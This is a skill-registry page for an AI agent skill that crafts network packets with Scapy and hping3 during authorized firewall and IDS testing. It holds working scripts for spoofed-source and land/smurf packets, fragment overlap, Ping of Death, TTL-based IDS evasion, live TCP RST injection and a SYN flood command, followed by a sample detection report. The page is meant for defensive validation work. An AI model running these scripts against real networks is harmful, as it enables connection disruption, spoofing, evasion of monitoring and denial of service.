Crafts and injects custom network packets using Scapy, hping3, and Nemesis during authorized security assessments to test firewall rules, IDS detection, protocol handling, and network stack resilience against malformed and spoofed traffic.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionperforming-packet-injection-attackExecute the skills CLI command in your project's root directory to begin installation:
Fetches performing-packet-injection-attack from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate performing-packet-injection-attack. Access via /performing-packet-injection-attack in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | performing-packet-injection-attack |
| description | 'Crafts and injects custom network packets using Scapy, hping3, and Nemesis during authorized security assessments to test firewall rules, IDS detection, protocol handling, and network stack resilience against malformed and spoofed traffic. ' |
| domain | cybersecurity |
| subdomain | network-security |
| tags | - network-security - packet-injection - scapy - hping3 - protocol-testing |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02 |
Do not use for denial-of-service attacks against production systems, for spoofing traffic to frame third parties, or without explicit authorization for the target network.
#!/usr/bin/env python3
"""Basic packet injection examples using Scapy for authorized testing."""
from scapy.all import *
# TCP SYN packet (port scan simulation)
syn = IP(dst="10.10.20.10") / TCP(dport=80, flags="S", seq=1000)
response = sr1(syn, timeout=2, verbose=0)
if response and response.haslayer(TCP):
if response[TCP].flags == "SA":
print(f"[*] Port 80 is OPEN (SYN-ACK received)")
elif response[TCP].flags == "RA":
print(f"[*] Port 80 is CLOSED (RST-ACK received)")
# TCP XMAS scan packet (all flags set)
xmas = IP(dst="10.10.20.10") / TCP(dport=80, flags="FPU")
send(xmas, verbose=0)
print("[*] XMAS packet sent (should trigger IDS)")
# NULL scan packet (no flags)
null = IP(dst="10.10.20.10") / TCP(dport=80, flags="")
send(null, verbose=0)
print("[*] NULL packet sent")
# Crafted ICMP packet with custom payload
icmp_custom = IP(dst="10.10.20.10") / ICMP(type=8) / Raw(load="SECURITY_TEST_PAYLOAD")
send(icmp_custom, verbose=0)
print("[*] Custom ICMP packet sent")
# UDP packet to test firewall rules
udp_test = IP(dst="10.10.20.10") / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="test.example.com"))
response = sr1(udp_test, timeout=2, verbose=0)
if response:
print(f"[*] DNS response received from {response[IP].src}")
#!/usr/bin/env python3
"""Test anti-spoofing controls with spoofed source IP packets."""
from scapy.all import *
# Spoofed source IP (should be blocked by BCP38/uRPF)
spoofed_syn = IP(src="192.0.2.100", dst="10.10.20.10") / TCP(dport=80, flags="S")
send(spoofed_syn, verbose=0)
print("[*] Sent SYN with spoofed source 192.0.2.100")
# Land attack test (source = destination)
land = IP(src="10.10.20.10", dst="10.10.20.10") / TCP(sport=80, dport=80, flags="S")
send(land, verbose=0)
print("[*] Land attack packet sent (src==dst)")
# Smurf attack test (ICMP to broadcast with spoofed source)
smurf = IP(src="10.10.20.10", dst="10.10.20.255") / ICMP(type=8)
send(smurf, verbose=0)
print("[*] Smurf test packet sent (ICMP to broadcast)")
# IP fragment overlap test
frag1 = IP(dst="10.10.20.10", flags="MF", frag=0) / TCP(dport=80, flags="S") / Raw(load="A"*24)
frag2 = IP(dst="10.10.20.10", frag=2) / Raw(load="B"*24) # Overlapping fragment
send(frag1, verbose=0)
send(frag2, verbose=0)
print("[*] Overlapping IP fragments sent")
# TCP RST injection to test connection resilience
# Using hping3 to send RST packets
sudo hping3 -S -p 80 --rst -c 5 10.10.20.10
# SYN flood test (limited volume for testing, not DoS)
sudo hping3 -S --flood -V -p 80 -c 100 10.10.20.10
# Note: --flood sends at maximum rate; -c 100 limits to 100 packets
# Test TCP window manipulation
sudo hping3 -S -p 80 -w 0 -c 5 10.10.20.10 # Zero window
sudo hping3 -S -p 80 -w 65535 -c 5 10.10.20.10 # Max window
# Idle scan probe (to test if a host can be used as zombie)
sudo hping3 -SA -p 80 -c 3 10.10.20.10
# Check IP ID values in response for predictability
#!/usr/bin/env python3
"""TCP RST injection to test session resilience."""
from scapy.all import *
# Sniff for an active TCP connection and inject RST
def rst_inject(pkt):
if pkt.haslayer(TCP) and pkt[TCP].flags == "A":
rst = IP(
src=pkt[IP].dst,
dst=pkt[IP].src
) / TCP(
sport=pkt[TCP].dport,
dport=pkt[TCP].sport,
seq=pkt[TCP].ack,
flags="R"
)
send(rst, verbose=0)
print(f"[*] RST injected: {pkt[IP].src}:{pkt[TCP].sport} -> {pkt[IP].dst}:{pkt[TCP].dport}")
# Sniff for 10 packets and attempt RST injection
print("[*] Listening for TCP ACK packets to inject RST...")
sniff(filter="tcp and host 10.10.20.10", prn=rst_inject, count=10, iface="eth0")
#!/usr/bin/env python3
"""Protocol anomaly packets for IDS/firewall testing."""
from scapy.all import *
target = "10.10.20.10"
# Ping of Death (oversized ICMP - should be blocked)
pod = IP(dst=target) / ICMP() / Raw(load="X" * 65500)
send(fragment(pod), verbose=0)
print("[*] Ping of Death fragments sent")
# Tiny fragment attack (TCP header split across fragments)
tiny_frag = IP(dst=target, flags="MF", frag=0) / Raw(load=bytes(TCP(dport=80, flags="S"))[:8])
tiny_frag2 = IP(dst=target, frag=1) / Raw(load=bytes(TCP(dport=80, flags="S"))[8:])
send(tiny_frag, verbose=0)
send(tiny_frag2, verbose=0)
print("[*] Tiny fragment attack packets sent")
# Invalid TCP flag combinations
invalid_flags = [
("SYN+FIN", "SF"),
("SYN+RST", "SR"),
("FIN only (no session)", "F"),
("All flags", "FSRPAUEC"),
]
for name, flags in invalid_flags:
pkt = IP(dst=target) / TCP(dport=80, flags=flags)
send(pkt, verbose=0)
print(f"[*] Sent packet with invalid flags: {name}")
# TTL-based evasion (packets that expire before reaching IDS)
# Assumes IDS is 2 hops away, target is 5 hops
ttl_evade = IP(dst=target, ttl=3) / TCP(dport=80, flags="S")
send(ttl_evade, verbose=0)
print("[*] Low-TTL evasion packet sent (TTL=3)")
# IP options padding
ip_opts = IP(dst=target, options=[IPOption_RR()]) / TCP(dport=80, flags="S")
send(ip_opts, verbose=0)
print("[*] Packet with IP Record Route option sent")
# Check Snort/Suricata for alerts triggered by injected packets
grep -i "xmas\|null\|land\|smurf\|ping.of.death\|fragment" /var/log/suricata/eve.json | \
python3 -m json.tool | head -50
# Expected IDS alerts:
# - XMAS scan detected (SID: 2100330)
# - NULL scan detected (SID: 2100331)
# - Land attack detected
# - Smurf attack detected
# - Fragmentation anomaly
# - Invalid TCP flags
# Verify firewall dropped spoofed packets
sudo iptables -L -n -v | grep -i drop
# Check for fragmentation reassembly errors
dmesg | grep -i "fragment\|frag"
# Generate test results summary
cat > packet_injection_report.txt << 'EOF'
Packet Injection Test Results
=============================
Date: $(date)
Target: 10.10.20.10
Tester: Security Assessment Team
Test 1: TCP XMAS Scan
IDS Detection: YES (Suricata SID 2100330)
Firewall Action: Dropped
Test 2: IP Spoofing (192.0.2.100)
uRPF Block: YES (packet dropped at edge router)
IDS Detection: YES (source not in HOME_NET)
Test 3: Fragmentation Overlap
IDS Detection: YES (stream reassembly anomaly)
Target Response: Fragments dropped by OS
Test 4: Invalid TCP Flags
IDS Detection: YES (SYN+FIN, SYN+RST flagged)
Firewall Action: Dropped
EOF
| Term | Definition |
|---|---|
| Packet Injection | Crafting and sending network packets with specific header values, payloads, or flag combinations to test network security controls |
| IP Spoofing | Setting a false source IP address in crafted packets to test anti-spoofing controls (BCP38, uRPF) or impersonate another host |
| TCP RST Injection | Sending forged TCP RST packets to terminate established connections, testing session resilience and connection reset defenses |
| Fragmentation Attack | Exploiting IP fragmentation to split malicious payloads across fragments, evading packet inspection that does not reassemble fragments |
| uRPF (Unicast Reverse Path Forwarding) | Router-level anti-spoofing mechanism that drops packets if the source IP would not be routable back through the ingress interface |
| BCP38 (Network Ingress Filtering) | Best Current Practice for preventing IP spoofing at network borders by filtering packets with source addresses not belonging to the network |
Context: A SOC team deployed new Suricata rules for detecting reconnaissance and evasion techniques. They need to validate that the rules trigger correctly before going live. The testing is performed in a staging environment replicating the production network.
Approach:
Pitfalls:
## Packet Injection Test Report
**Target**: 10.10.20.10 (test-server-01)
**IDS Sensor**: suricata-staging-01
**Test Date**: 2024-03-15
### Test Matrix
| Test | Packet Type | Expected Detection | Actual Result |
|------|-------------|-------------------|---------------|
| 1 | TCP XMAS Scan | SID 2100330 | DETECTED |
| 2 | TCP NULL Scan | SID 2100331 | DETECTED |
| 3 | SYN+FIN Invalid | SID 2100332 | DETECTED |
| 4 | IP Spoofed Source | SID 2003000 | DETECTED |
| 5 | Land Attack | SID 2100333 | NOT DETECTED |
| 6 | Fragment Overlap | SID 2200001 | DETECTED |
| 7 | Ping of Death | SID 2100334 | DETECTED |
| 8 | TCP RST Injection | Custom SID | NOT DETECTED |
### Detection Rate: 6/8 (75%)
### Gaps Identified
1. Land attack (src==dst) not detected -- add rule SID 2100333
2. TCP RST injection not detected -- create custom rule for out-of-window RST
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
Useful defaults in performing-packet-injection-attack — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
performing-packet-injection-attack has been reliable in day-to-day use. Documentation quality is above average for community skills.
Keeps context tight: performing-packet-injection-attack is the kind of skill you can hand to a new teammate without a long onboarding doc.
We added performing-packet-injection-attack from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
performing-packet-injection-attack reduced setup friction for our internal harness; good balance of opinion and flexibility.
Registry listing for performing-packet-injection-attack matched our evaluation — installs cleanly and behaves as described in the markdown.
performing-packet-injection-attack fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Keeps context tight: performing-packet-injection-attack is the kind of skill you can hand to a new teammate without a long onboarding doc.
Solid pick for teams standardizing on skills: performing-packet-injection-attack is focused, and the summary matches what you get after install.
I recommend performing-packet-injection-attack for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
showing 1-10 of 51